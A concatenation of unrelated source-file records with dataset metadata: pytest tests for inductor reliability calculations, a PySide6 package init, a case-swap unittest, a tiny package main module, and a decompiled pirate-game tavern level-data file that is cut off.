    """get_part_count_lambda_b() should raise a KeyError when passed an
    unknown subcategory ID."""
    # Subcategory 20 does not exist in the parts-count tables.
    with pytest.raises(KeyError):
        inductor.get_part_count_lambda_b(20, 3, 1)
@pytest.mark.unit
def test_get_part_count_lambda_b_no_family():
    """get_part_count_lambda_b() should raise a KeyError when passed an
    unknown family ID."""
    # Family 12 does not exist for subcategory 2.
    with pytest.raises(KeyError):
        inductor.get_part_count_lambda_b(2, 3, 12)
@pytest.mark.unit
def test_get_part_count_lambda_b_no_environment():
    """get_part_count_lambda_b() should raise an IndexError when passed an
    unknown active environment ID."""
    # Environment 31 is past the end of the 14-entry table.
    with pytest.raises(IndexError):
        inductor.get_part_count_lambda_b(2, 31, 1)
@pytest.mark.unit
# Fixed: the marker is spelled "usefixtures"; the previous "usefixture"
# is not a pytest marker and was silently ignored.
@pytest.mark.usefixtures("test_attributes_inductor")
@pytest.mark.parametrize("family_id", [1, 2])
@pytest.mark.parametrize(
    "environment_active_id", [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]
)
def test_calculate_part_count_inductor(
    family_id,
    environment_active_id,
    test_attributes_inductor,
):
    """calculate_part_count() should return a float value for the base
    hazard rate of a coil (subcategory 2) on success."""
    # MIL-HDBK-217F parts-count table: family -> rate per environment.
    _expected = {
        1: [0.0017, 0.0073, 0.023, 0.0091, 0.031, 0.011, 0.015, 0.016,
            0.022, 0.052, 0.00083, 0.25, 0.073, 1.1],
        2: [0.0033, 0.015, 0.046, 0.018, 0.061, 0.022, 0.03, 0.033,
            0.044, 0.10, 0.0017, 0.05, 0.15, 2.2],
    }

    test_attributes_inductor["subcategory_id"] = 2
    test_attributes_inductor["family_id"] = family_id
    test_attributes_inductor["environment_active_id"] = environment_active_id
    _lambda_b = inductor.calculate_part_count(**test_attributes_inductor)

    assert isinstance(_lambda_b, float)
    # Environment IDs are 1-based; the table rows are 0-based.
    assert _lambda_b == _expected[family_id][environment_active_id - 1]
@pytest.mark.unit
# Fixed: the marker is spelled "usefixtures"; the previous "usefixture"
# is not a pytest marker and was silently ignored.
@pytest.mark.usefixtures("test_attributes_inductor")
@pytest.mark.parametrize("family_id", [1, 2, 3, 4])
@pytest.mark.parametrize(
    "environment_active_id",
    [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],
)
def test_calculate_part_count_xfmr(
    family_id,
    environment_active_id,
    test_attributes_inductor,
):
    """calculate_part_count() should return a float value for the base
    hazard rate of a transformer (subcategory 1) on success."""
    # MIL-HDBK-217F parts-count table: family -> rate per environment.
    _expected = {
        1: [0.0035, 0.023, 0.049, 0.019, 0.065, 0.027, 0.037, 0.041,
            0.052, 0.11, 0.0018, 0.053, 0.16, 2.3],
        2: [0.0071, 0.046, 0.097, 0.038, 0.13, 0.055, 0.073, 0.081,
            0.10, 0.22, 0.035, 0.11, 0.31, 4.7],
        3: [0.023, 0.16, 0.35, 0.13, 0.45, 0.21, 0.27, 0.35,
            0.45, 0.82, 0.011, 0.37, 1.2, 16.0],
        4: [0.028, 0.18, 0.39, 0.15, 0.52, 0.22, 0.29, 0.33,
            0.42, 0.88, 0.015, 0.42, 1.2, 19.0],
    }

    test_attributes_inductor["subcategory_id"] = 1
    test_attributes_inductor["family_id"] = family_id
    test_attributes_inductor["environment_active_id"] = environment_active_id
    _lambda_b = inductor.calculate_part_count(**test_attributes_inductor)

    assert isinstance(_lambda_b, float)
    # Environment IDs are 1-based; the table rows are 0-based.
    assert _lambda_b == _expected[family_id][environment_active_id - 1]
@pytest.mark.unit
@pytest.mark.parametrize(
    "page_number",
    [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],
)
def test_get_temperature_rise_spec_sheet(page_number):
    """get_temperature_rise_spec_sheet() should return a float value for the
    temperature_rise on success."""
    # Expected temperature rise per spec-sheet page number.
    _expected = {
        1: 15.0, 2: 15.0, 3: 15.0, 4: 35.0, 5: 15.0, 6: 35.0, 7: 15.0,
        8: 35.0, 9: 15.0, 10: 15.0, 11: 35.0, 12: 35.0, 13: 15.0, 14: 15.0,
    }

    _temperature_rise = inductor.get_temperature_rise_spec_sheet(page_number)

    assert isinstance(_temperature_rise, float)
    assert _temperature_rise == _expected[page_number]
@pytest.mark.unit
@pytest.mark.usefixtures("test_attributes_inductor")
def test_get_temperature_rise_spec_id(test_attributes_inductor):
    """calculate_part_stress() should populate temperature_rise from the
    spec sheet as a float."""
    # Spec 2 / page 14 maps to a 15.0 degree rise in the spec-sheet table.
    test_attributes_inductor["subcategory_id"] = 2
    test_attributes_inductor["specification_id"] = 2
    test_attributes_inductor["page_number"] = 14

    _attributes = inductor.calculate_part_stress(**test_attributes_inductor)

    assert isinstance(_attributes["temperature_rise"], float)
    assert _attributes["temperature_rise"] == 15.0
@pytest.mark.unit
def test_get_temperature_rise_no_spec_sheet():
    """get_temperature_rise_spec_sheet() should raise a KeyError when passed an
    unknown page number."""
    with pytest.raises(KeyError):
        inductor.get_temperature_rise_spec_sheet(22)
@pytest.mark.unit
def test_calculate_temperature_rise_input_power_weight():
    """calculate_temperature_rise_input_power_weight() should return a float
    value on success."""
    _input_power = 0.387
    _weight = 0.015

    _rise = inductor.calculate_temperature_rise_input_power_weight(
        _input_power, _weight
    )

    assert isinstance(_rise, float)
    assert _rise == pytest.approx(13.93114825)
@pytest.mark.unit
def test_calculate_temperature_rise_input_power_weight_zero_weight():
    """Passing a weight of 0.0 should make
    calculate_temperature_rise_input_power_weight() raise a ZeroDivisionError."""
    _input_power, _weight = 0.387, 0.0
    with pytest.raises(ZeroDivisionError):
        inductor.calculate_temperature_rise_input_power_weight(_input_power, _weight)
@pytest.mark.unit
def test_calculate_temperature_rise_power_loss_surface():
    """calculate_temperature_rise_power_loss_surface() should return a float
    value on success."""
    _power_loss = 0.387
    _surface_area = 12.5

    _rise = inductor.calculate_temperature_rise_power_loss_surface(
        _power_loss, _surface_area
    )

    assert isinstance(_rise, float)
    assert _rise == 3.87
@pytest.mark.unit
def test_calculate_temperature_rise_power_loss_surface_zero_area():
    """Passing an area of 0.0 should make
    calculate_temperature_rise_power_loss_surface() raise a ZeroDivisionError."""
    _power_loss, _surface_area = 0.387, 0.0
    with pytest.raises(ZeroDivisionError):
        inductor.calculate_temperature_rise_power_loss_surface(
            _power_loss, _surface_area
        )
@pytest.mark.unit
def test_calculate_temperature_rise_power_loss_weight():
    """calculate_temperature_rise_power_loss_weight() should return a float
    value on success."""
    _temperature_rise = inductor.calculate_temperature_rise_power_loss_weight(
        0.387, 2.5
    )
    assert isinstance(_temperature_rise, float)
    assert _temperature_rise == pytest.approx(2.394211958)
@pytest.mark.unit
def test_calculate_temperature_rise_power_loss_weight_zero_weight():
    """Passing a weight of 0.0 should make
    calculate_temperature_rise_power_loss_weight() raise a ZeroDivisionError."""
    _power_loss, _weight = 0.387, 0.0
    with pytest.raises(ZeroDivisionError):
        inductor.calculate_temperature_rise_power_loss_weight(_power_loss, _weight)
@pytest.mark.unit
def test_calculate_hot_spot_temperature():
    """calculate_hot_spot_temperature() should return a float value on success."""
    _temperature_active = 43.2
    _temperature_rise = 38.7

    _hot_spot = inductor.calculate_hot_spot_temperature(
        _temperature_active, _temperature_rise
    )

    assert isinstance(_hot_spot, float)
    assert _hot_spot == pytest.approx(85.77)
@pytest.mark.unit
def test_calculate_part_stress_lambda_b():
    """calculate_part_stress_lambda_b() should return a float value on success."""
    _subcategory_id = 1
    _insulation_id = 4
    _temperature_hot_spot = 85.77

    _lambda_b = inductor.calculate_part_stress_lambda_b(
        _subcategory_id, _insulation_id, _temperature_hot_spot
    )

    assert isinstance(_lambda_b, float)
    assert _lambda_b == pytest.approx(0.00280133)
@pytest.mark.unit
def test_calculate_part_stress_lambda_b_no_subcategory():
    """calculate_part_stress_lambda_b() should raise a KeyError when passed an
    unknown subcategory ID."""
    with pytest.raises(KeyError):
        inductor.calculate_part_stress_lambda_b(101, 4, 85.77)
@pytest.mark.unit
def test_calculate_part_stress_lambda_b_no_insulation():
    """calculate_part_stress_lambda_b() should raise a KeyError when passed an
    unknown insulation ID."""
    with pytest.raises(KeyError):
        inductor.calculate_part_stress_lambda_b(1, 41, 85.77)
@pytest.mark.unit
@pytest.mark.parametrize("subcategory_id", [1, 2])
def test_get_part_stress_quality_factor(subcategory_id):
    """get_part_stress_quality_factor() should return a float value for piQ on
    success."""
    # Subcategory 1 (transformers) carries piQ=1.5; subcategory 2 carries 0.03.
    _expected = 1.5 if subcategory_id == 1 else 0.03

    _pi_q = inductor.get_part_stress_quality_factor(subcategory_id, 1, 1)

    assert isinstance(_pi_q, float)
    assert _pi_q == _expected
@pytest.mark.unit
@pytest.mark.usefixtures("test_attributes_inductor")
def test_calculate_part_stress_inductor(test_attributes_inductor):
    """calculate_part_stress() should return a dictionary of updated values on
    success.

    Bug fix: the mark was misspelled ``usefixture``; pytest silently ignores
    unknown marks, so the intended ``usefixtures`` mark never took effect.
    """
    test_attributes_inductor["subcategory_id"] = 2
    test_attributes_inductor["construction_id"] = 2

    _attributes = inductor.calculate_part_stress(**test_attributes_inductor)

    assert isinstance(_attributes, dict)
    assert _attributes["lambda_b"] == pytest.approx(0.00046712295)
    assert _attributes["piC"] == 2.0
    assert _attributes["hazard_rate_active"] == pytest.approx(0.00014013688)
@pytest.mark.unit
@pytest.mark.usefixtures("test_attributes_inductor")
def test_calculate_part_stress_xfmr_with_surface_area(test_attributes_inductor):
    """calculate_part_stress() should return a dictionary of updated values on
    success.

    Bug fix: the mark was misspelled ``usefixture``; pytest silently ignores
    unknown marks, so the intended ``usefixtures`` mark never took effect.
    """
    test_attributes_inductor["subcategory_id"] = 1
    test_attributes_inductor["construction_id"] = 1

    _attributes = inductor.calculate_part_stress(**test_attributes_inductor)

    assert isinstance(_attributes, dict)
    assert _attributes["lambda_b"] == pytest.approx(0.0026358035)
    assert _attributes["piC"] == 1.0
    assert _attributes["hazard_rate_active"] == pytest.approx(0.01976853)
@pytest.mark.unit
@pytest.mark.usefixtures("test_attributes_inductor")
def test_calculate_part_stress_xfmr_with_weight(test_attributes_inductor):
    """calculate_part_stress() should return a dictionary of updated values on
    success.

    Bug fix: the mark was misspelled ``usefixture``; pytest silently ignores
    unknown marks, so the intended ``usefixtures`` mark never took effect.
    """
    test_attributes_inductor["subcategory_id"] = 1
    test_attributes_inductor["construction_id"] = 1
    # Zero voltage and area steer the calculation to the power-loss/weight
    # temperature-rise branch.
    test_attributes_inductor["power_operating"] = 0.387
    test_attributes_inductor["voltage_dc_operating"] = 0.0
    test_attributes_inductor["area"] = 0.0
    test_attributes_inductor["weight"] = 2.5

    _attributes = inductor.calculate_part_stress(**test_attributes_inductor)

    assert isinstance(_attributes, dict)
    assert _attributes["temperature_rise"] == pytest.approx(2.39421196)
    assert _attributes["lambda_b"] == pytest.approx(0.0024684654)
    assert _attributes["piC"] == 1.0
    assert _attributes["hazard_rate_active"] == pytest.approx(0.01851349)
@pytest.mark.unit
@pytest.mark.usefixtures("test_attributes_inductor")
def test_calculate_part_stress_xfmr_with_input_power(test_attributes_inductor):
    """calculate_part_stress() should return a dictionary of updated values on
    success.

    Bug fix: the mark was misspelled ``usefixture``; pytest silently ignores
    unknown marks, so the intended ``usefixtures`` mark never took effect.
    """
    test_attributes_inductor["subcategory_id"] = 1
    test_attributes_inductor["construction_id"] = 1
    # Zero operating power and area with a non-zero voltage steer the
    # calculation to the input-power/weight temperature-rise branch.
    test_attributes_inductor["power_operating"] = 0.0
    test_attributes_inductor["voltage_dc_operating"] = 3.3
    test_attributes_inductor["area"] = 0.0
    test_attributes_inductor["weight"] = 2.5

    _attributes = inductor.calculate_part_stress(**test_attributes_inductor)

    assert isinstance(_attributes, dict)
    assert _attributes["temperature_rise"] == pytest.approx(0.0040553804)
    assert _attributes["lambda_b"] == pytest.approx(0.0024148713)
    assert _attributes["piC"] == 1.0
    assert _attributes["hazard_rate_active"] == pytest.approx(0.01811153)
@pytest.mark.unit
@pytest.mark.usefixtures("test_attributes_inductor")
def test_calculate_part_stress_xfmr_no_temperature_rise(test_attributes_inductor):
    """calculate_part_stress() should return a dictionary of updated values on
    success.

    Bug fix: the mark was misspelled ``usefixture``; pytest silently ignores
    unknown marks, so the intended ``usefixtures`` mark never took effect.
    """
    test_attributes_inductor["subcategory_id"] = 1
    test_attributes_inductor["construction_id"] = 1
    # All-zero inputs leave no basis for a temperature rise; it stays at 0.0.
    test_attributes_inductor["power_operating"] = 0.0
    test_attributes_inductor["voltage_dc_operating"] = 0.0
    test_attributes_inductor["area"] = 0.0
    test_attributes_inductor["weight"] = 0.0

    _attributes = inductor.calculate_part_stress(**test_attributes_inductor)

    assert isinstance(_attributes, dict)
    assert _attributes["temperature_rise"] == 0.0
    assert _attributes["lambda_b"] == pytest.approx(0.0024147842)
    assert _attributes["piC"] == 1.0
    assert _attributes["hazard_rate_active"] == pytest.approx(0.01811088)
@pytest.mark.unit
def test_set_default_max_rated_temperature():
    """should return the default maximum rated temperature for the selected
    subcategory ID."""
    assert inductor._set_default_max_rated_temperature(1) == 130.0
    assert inductor._set_default_max_rated_temperature(2) == 125.0
@pytest.mark.unit
def test_set_default_temperature_rise():
    """should return the default temperature rise for the selected subcategory
    ID and second (family/specification) ID."""
    assert inductor._set_default_temperature_rise(1, 1) == 10.0
    assert inductor._set_default_temperature_rise(1, 3) == 30.0
    assert inductor._set_default_temperature_rise(2, 1) == 10.0
@pytest.mark.unit
@pytest.mark.usefixtures("test_attributes_inductor")
def test_set_default_values(test_attributes_inductor):
    """should set default values for each parameter <= 0.0."""
    test_attributes_inductor.update(
        {
            "rated_temperature_max": 0.0,
            "temperature_rise": 0.0,
            "subcategory_id": 1,
        }
    )

    _attributes = inductor.set_default_values(**test_attributes_inductor)

    assert isinstance(_attributes, dict)
    assert _attributes["rated_temperature_max"] == 130.0
    assert _attributes["temperature_rise"] == 10.0
@pytest.mark.unit
@pytest.mark.usefixtures("test_attributes_inductor")
def test_set_default_values_none_needed(test_attributes_inductor):
    """should not set default values for each parameter > 0.0."""
    test_attributes_inductor.update(
        {
            "rated_temperature_max": 135.0,
            "temperature_rise": 5.0,
            "subcategory_id": 1,
        }
    )

    _attributes = inductor.set_default_values(**test_attributes_inductor)

    assert isinstance(_attributes, dict)
    assert _attributes["rated_temperature_max"] == 135.0
    assert _attributes["temperature_rise"] == 5.0
| 30.707165
| 88
| 0.608248
| 2,394
| 19,714
| 4.691729
| 0.095238
| 0.123397
| 0.137108
| 0.024217
| 0.887464
| 0.861734
| 0.820335
| 0.755876
| 0.7362
| 0.718572
| 0
| 0.083459
| 0.291925
| 19,714
| 641
| 89
| 30.75507
| 0.721183
| 0.148524
| 0
| 0.726166
| 0
| 0
| 0.072319
| 0.027233
| 0
| 0
| 0
| 0
| 0.117647
| 1
| 0.060852
| false
| 0
| 0.004057
| 0
| 0.064909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
da299d46fb201cac14d730a8d25fa58400725b4e
| 176
|
py
|
Python
|
ui/__init__.py
|
magnusjwatson2786/Container-GUI
|
42cbe1bb970fbabe5b5fde873425f262e9207d30
|
[
"MIT"
] | null | null | null |
ui/__init__.py
|
magnusjwatson2786/Container-GUI
|
42cbe1bb970fbabe5b5fde873425f262e9207d30
|
[
"MIT"
] | null | null | null |
ui/__init__.py
|
magnusjwatson2786/Container-GUI
|
42cbe1bb970fbabe5b5fde873425f262e9207d30
|
[
"MIT"
] | null | null | null |
from PySide6.QtCore import *
from PySide6.QtGui import *
from PySide6.QtWidgets import *
from . ui_q3y import Ui_MainWindow
from . config import Config
from . fxns import *
| 17.6
| 34
| 0.772727
| 25
| 176
| 5.36
| 0.44
| 0.246269
| 0.253731
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027397
| 0.170455
| 176
| 9
| 35
| 19.555556
| 0.890411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e5055ada1e64560a8a368105e2019840ede5abf9
| 51
|
py
|
Python
|
mulpro/__init__.py
|
Toonggg/mulpro
|
a341d371990e9550cf6df028871c17a82e764943
|
[
"BSD-2-Clause"
] | null | null | null |
mulpro/__init__.py
|
Toonggg/mulpro
|
a341d371990e9550cf6df028871c17a82e764943
|
[
"BSD-2-Clause"
] | null | null | null |
mulpro/__init__.py
|
Toonggg/mulpro
|
a341d371990e9550cf6df028871c17a82e764943
|
[
"BSD-2-Clause"
] | null | null | null |
from mulpro import mulpro, log
#import mulpro, log
| 25.5
| 30
| 0.784314
| 8
| 51
| 5
| 0.5
| 0.6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156863
| 51
| 2
| 31
| 25.5
| 0.930233
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e51915da24d302cda8208289c3415add74ac5e0e
| 3,289
|
py
|
Python
|
tests/AOJ/test_ITP1_8_A.py
|
nabetama-training/CompetitionProgrammingPractice
|
0801173df3992c2e78b02b383f2df9ba792cbf2f
|
[
"BSD-2-Clause"
] | null | null | null |
tests/AOJ/test_ITP1_8_A.py
|
nabetama-training/CompetitionProgrammingPractice
|
0801173df3992c2e78b02b383f2df9ba792cbf2f
|
[
"BSD-2-Clause"
] | 2
|
2020-07-04T04:19:28.000Z
|
2020-07-26T06:16:07.000Z
|
tests/AOJ/test_ITP1_8_A.py
|
nabetama-training/CompetitionProgrammingPractice
|
0801173df3992c2e78b02b383f2df9ba792cbf2f
|
[
"BSD-2-Clause"
] | null | null | null |
import sys
from io import StringIO
import unittest
from src.AOJ.ITP1_8_A import resolve
class TestClass(unittest.TestCase):
    """Tests for src.AOJ.ITP1_8_A.resolve.

    The fixtures show resolve() swapping the case of every alphabetic
    character read from stdin (e.g. ``fAIR`` -> ``Fair``, ``a`` -> ``A``).
    """

    def assertIO(self, input, output):
        """Feed *input* to resolve() via stdin and assert stdout equals *output*.

        Bug fix: the original swapped sys.stdout/sys.stdin back only on the
        success path; if resolve() raised, the real streams stayed replaced
        and broke every subsequent test.  Restoration now happens in a
        ``finally`` block.
        """
        stdout, stdin = sys.stdout, sys.stdin
        sys.stdout, sys.stdin = StringIO(), StringIO(input)
        try:
            resolve()
            sys.stdout.seek(0)
            out = sys.stdout.read()
        finally:
            # Always restore the real streams, even when resolve() raises.
            sys.stdout, sys.stdin = stdout, stdin
        self.assertEqual(out, output)

    def test_1(self):
        # Mixed-case sentence with punctuation.
        input = """fAIR, LATER, OCCASIONALLY CLOUDY.
"""
        output = """Fair, later, occasionally cloudy.
"""
        self.assertIO(input, output)

    def test_2(self):
        # Single lowercase character.
        input = """a
"""
        output = """A
"""
        self.assertIO(input, output)

    def test_3(self):
        # Digits must pass through unchanged.
        input = """s1061159 m5061126 d8061103
"""
        output = """S1061159 M5061126 D8061103
"""
        self.assertIO(input, output)

    def test_4(self):
        # Long free-text input exercising many tokens.
        input = """tHE uNIVERSITY OF aIZU TEAM VISITED gOVERNOR sATO AT THE fUKUSHIMA pREFECTURAL oFFICE ON mAY 26 TO REPORT THE RESULT OF THEIR FIRST PARTICIPATION AT THE acm-icpc wORLD fINALS (aPRIL 2009, sWEDEN). cOACH yUTAKA wATANOBE AND 2 CONTESTANTS, mR. tAKASHI tAYAMA AND mR. yUKI hIRANO, VISITED THE gOVERNOR ACCOMPANYING WITH vICE pRESIDENT nICOLAY mIRENKOV, WHO MADE AN INTRODUCTION OF THE TEAM TO THE gOVERNOR. cOACH wATANOBE EXPLAINED THE ATMOSPHERE OF THE CONTEST AND THE TEAM'S PERFORMANCE USING PICTURES AND DOCUMENTS HE BROUGHT. tHE TEAM RECEIVED A COMPLIMENT FROM THE gOVERNOR SHOWING HIS GRATITUDE TO THE TEAM FOR PROVING THE uNIVERSITY THROUGH THE CONTEST COMPETING WITH OTHER WORLD-RENOWNED UNIVERSITIES. tHE gOVERNOR ALSO EXPRESSED HIS HIGH EXPECTATION TO THE TEAM TO MAKE FURTHER ACHIEVEMENT IN THE FUTURE. tHE TEAM WAS ENCOURAGED BY HIS WORDS AND REAFFIRMED THEIR DETERMINATION TO PASS THE PRELIMINARY ROUND WITHIN jAPAN IN jULY AND THE aSIA rEGIONALS IN nOVEMBER TO GO TO THE fINALS AGAIN. bEFORE THE VISIT TO THE gOVERNOR, THE TEAM ALSO MET vICE gOVERNOR mATSUMOTO AND vICE gOVERNOR uCHIBORI, AND THEY COMMENDED THE TEAM FOR THE ACHIEVEMENT.
"""
        output = """The University of Aizu team visited Governor Sato at the Fukushima Prefectural Office on May 26 to report the result of their first participation at the ACM-ICPC World Finals (April 2009, Sweden). Coach Yutaka Watanobe and 2 contestants, Mr. Takashi Tayama and Mr. Yuki Hirano, visited the Governor accompanying with Vice President Nicolay Mirenkov, who made an introduction of the team to the Governor. Coach Watanobe explained the atmosphere of the contest and the team's performance using pictures and documents he brought. The team received a compliment from the Governor showing his gratitude to the team for proving the University through the contest competing with other world-renowned universities. The Governor also expressed his high expectation to the team to make further achievement in the future. The team was encouraged by his words and reaffirmed their determination to pass the preliminary round within Japan in July and the Asia Regionals in November to go to the Finals again. Before the visit to the Governor, the team also met Vice Governor Matsumoto and Vice Governor Uchibori, and they commended the team for the achievement.
"""
        self.assertIO(input, output)
| 71.5
| 1,168
| 0.751292
| 483
| 3,289
| 5.10352
| 0.293996
| 0.045436
| 0.021095
| 0.037323
| 0.82069
| 0.804868
| 0.768357
| 0.768357
| 0.768357
| 0.768357
| 0
| 0.023783
| 0.194588
| 3,289
| 45
| 1,169
| 73.088889
| 0.906757
| 0
| 0
| 0.324324
| 0
| 0.054054
| 0.737226
| 0
| 0
| 0
| 0
| 0
| 0.162162
| 1
| 0.135135
| false
| 0.054054
| 0.108108
| 0
| 0.27027
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
e53f3a98417fcd36a43864537d2c2c0d52f38321
| 63
|
py
|
Python
|
package1/package2/__main__.py
|
leowindwave/YAPT
|
ee5ec568ed746f90a18dc514836624d435a7ccdb
|
[
"CC0-1.0"
] | 4
|
2017-03-06T09:49:11.000Z
|
2019-10-16T00:09:38.000Z
|
package1/package2/__main__.py
|
leowindwave/YAPT
|
ee5ec568ed746f90a18dc514836624d435a7ccdb
|
[
"CC0-1.0"
] | null | null | null |
package1/package2/__main__.py
|
leowindwave/YAPT
|
ee5ec568ed746f90a18dc514836624d435a7ccdb
|
[
"CC0-1.0"
] | 7
|
2017-11-02T11:00:30.000Z
|
2020-01-31T22:41:27.000Z
|
# Demonstrates package execution order when run as ``python -m package1.package2``.
print("package1/package2/__main__.py executed")
# NOTE(review): bare ``import module2`` looks like an implicit relative import
# (Python 2 semantics); under Python 3 this requires module2 on sys.path — confirm.
import module2
| 21
| 47
| 0.825397
| 8
| 63
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050847
| 0.063492
| 63
| 2
| 48
| 31.5
| 0.762712
| 0
| 0
| 0
| 0
| 0
| 0.603175
| 0.460317
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
e552822ef5bb86eb7bd71b441f46a649f3542bcb
| 8,840
|
py
|
Python
|
pirates/leveleditor/worldData/pvpShipIsland1_int_tavern.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | 3
|
2021-02-25T06:38:13.000Z
|
2022-03-22T07:00:15.000Z
|
pirates/leveleditor/worldData/pvpShipIsland1_int_tavern.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | null | null | null |
pirates/leveleditor/worldData/pvpShipIsland1_int_tavern.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | 1
|
2021-02-25T06:38:17.000Z
|
2021-02-25T06:38:17.000Z
|
# uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.leveleditor.worldData.pvpShipIsland1_int_tavern
from pandac.PandaModules import Point3, VBase3, Vec4, Vec3
objectStruct = {'Objects': {'1202846053.19akelts0': {'Type': 'Building Interior', 'Name': '', 'AdditionalData': ['interior_tavern_b'], 'Instanced': False, 'Objects': {'1204236104.67akelts': {'Type': 'Door Locator Node', 'Name': 'door_locator', 'Hpr': VBase3(-179.829, 0.0, 0.0), 'Pos': Point3(-0.498, -4.914, 0.952), 'Scale': VBase3(1.0, 1.0, 1.0)}, '1204236104.69akelts': {'Type': 'Door Locator Node', 'Name': 'door_locator_2', 'Hpr': VBase3(0.0, 0.0, 0.0), 'Pos': Point3(-6.626, 20.947, 1.006), 'Scale': VBase3(1.0, 1.0, 1.0)}, '1208543385.0akelts': {'Type': 'Wall_Hangings', 'DisableCollision': False, 'Hpr': VBase3(8.288, 0.0, 0.0), 'Pos': Point3(0.577, 44.618, 16.331), 'Scale': VBase3(1.207, 1.207, 1.207), 'Visual': {'Color': (0.5, 0.45, 0.45, 1.0), 'Model': 'models/props/flag_hanging_french'}}, '1208543583.91akelts': {'Type': 'Townsperson', 'Category': 'Bartender', 'AnimSet': 'sweep', 'AuraFX': 'None', 'Boss': False, 'CustomModel': 'None', 'GhostColor': 'None', 'GhostFX': 0, 'Greeting Animation': '', 'HelpID': 'NONE', 'Holiday': '', 'Hpr': VBase3(-97.978, 0.0, 0.0), 'Instanced World': 'None', 'Level': '37', 'Notice Animation 1': '', 'Notice Animation 2': '', 'Patrol Radius': '12.0000', 'Pos': Point3(-49.928, 12.507, 1.127), 'PoseAnim': '', 'PoseFrame': '', 'Private Status': 'All', 'PropFXLeft': 'None', 'PropFXRight': 'None', 'PropLeft': 'None', 'PropRight': 'None', 'Respawns': True, 'Scale': VBase3(0.999, 0.999, 0.999), 'ShopID': 'PORT_ROYAL_DEFAULTS', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'Villager', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Zombie': False, 'spawnTimeAlt': '', 'spawnTimeBegin': 0.0, 'spawnTimeEnd': 0.0}, '1208544322.67akelts': {'Type': 'Townsperson', 'Category': 'Commoner', 'AnimSet': 'sit_sleep', 'AuraFX': 'None', 'Boss': False, 'CustomModel': 'None', 'GhostColor': 'None', 'GhostFX': 0, 'Greeting Animation': '', 'HelpID': 'NONE', 'Holiday': '', 'Hpr': VBase3(80.877, 0.0, 0.0), 'Instanced World': 
'None', 'Level': '37', 'Notice Animation 1': '', 'Notice Animation 2': '', 'Patrol Radius': '12.0000', 'Pos': Point3(-1.29, 23.625, 1.0), 'PoseAnim': '', 'PoseFrame': '', 'Private Status': 'All', 'PropFXLeft': 'None', 'PropFXRight': 'None', 'PropLeft': 'None', 'PropRight': 'None', 'Respawns': True, 'Scale': VBase3(1.0, 1.0, 1.0), 'ShopID': 'PORT_ROYAL_DEFAULTS', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'Villager', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Zombie': False, 'spawnTimeAlt': '', 'spawnTimeBegin': 0.0, 'spawnTimeEnd': 0.0}, '1208544716.73akelts': {'Type': 'Townsperson', 'Category': 'Commoner', 'AnimSet': 'bar_talk01', 'AuraFX': 'None', 'Boss': False, 'CustomModel': 'None', 'GhostColor': 'None', 'GhostFX': 0, 'Greeting Animation': '', 'Hpr': VBase3(-12.421, 0.0, 0.0), 'Instanced World': 'None', 'Level': '37', 'Notice Animation 1': '', 'Notice Animation 2': '', 'Patrol Radius': '12.0000', 'Pos': Point3(-45.095, -10.344, 1.0), 'PoseAnim': '', 'PoseFrame': '', 'Private Status': 'All', 'PropFXLeft': 'None', 'PropFXRight': 'None', 'PropLeft': 'None', 'PropRight': 